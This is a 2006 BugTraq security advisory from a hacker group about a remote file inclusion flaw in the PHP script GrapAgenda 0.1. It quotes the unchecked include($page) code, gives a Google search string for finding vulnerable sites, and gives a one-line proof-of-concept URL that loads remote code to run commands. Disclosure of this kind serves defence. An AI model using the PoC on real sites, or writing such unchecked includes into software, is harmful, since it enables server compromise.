BugTraq
[Kurdish Security # 25 ] GrapAgenda Remote Command Vulnerability Sep 05 2006 02:43PM
botan linuxmail org
* Kurdish Security Advisory

* Original Advisory : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-25-grapagen
da-remote.html

* Script : GrapAgenda

* Site : http://www.graphiks.net

* Version : 0.1

* Risk : High

* Class : Remote

* Contact : botan (at) linuxmail (dot) org [email concealed] and irc.gigachat.net #kurdhack

* Nice crackerz sh00tz:milex,b3g0k,azad,fearless,darki,qawiste and team : ColdHackers, Patriotic Hackers, Kurdish Hackers Clan [back ? auyehuah maybe] other teamz

------------------------------------------------------------------------
---------

Google w0rkez :P : "GrapAgenda"

lol now code :]

if($page!=""){

include($page);

}else{

include("accueil.php");

}

?>

huh :] nice code,

PoC

http://www.site.com/[agendapath]/index.php?page=yourcode.txt?&cmd=id

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus